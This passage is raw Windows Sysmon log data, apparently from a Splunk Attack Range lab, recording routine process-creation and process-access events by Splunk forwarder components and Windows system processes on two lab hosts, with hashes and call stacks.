07:42:25.592{0C1E0330-F261-60EB-2F79-00000000D001}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=97F2B168C86320EFAB6765726DA9879C,SHA256=8DA23FA57D51BDE0EF9822DF3E68F7DDE52CB1E8B744F93571A7D9DCE5931AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39708B4C01F50225A54CBA928464A82C,SHA256=E4D431FB905A8819EE79EB450B62805FED4AA730FC8268599AE220F0A0BC0F3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.153{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5482F1930A126F34B5F48F4F413C93F4,SHA256=A89AB223572E20AE4930BE4C6E4CD25D60D2F3571589DAD75EF616379AD2012A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:25.349{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECE6EEEC0E335AA996DD62EAB2F363A8,SHA256=C5E666CCF702956E538BBB30ABA9688CA43B05D83A229651DDEAB4EBA5DEDBFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:26.364{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EF1F6933CC3BF0A125E650B942FF69C,SHA256=71AF93F7681B2F9E0830E803E5512472654E471DEBF1E28E8C5DFCB4C4689D7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F262-60EB-3179-00000000D001}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F262-60EB-3179-00000000D001}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.966{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F262-60EB-3179-00000000D001}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.951{0C1E0330-F262-60EB-3179-00000000D001}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.622{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=97F2B168C86320EFAB6765726DA9879C,SHA256=8DA23FA57D51BDE0EF9822DF3E68F7DDE52CB1E8B744F93571A7D9DCE5931AE9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.294{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F262-60EB-3079-00000000D001}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.294{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.294{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805759Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805758Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 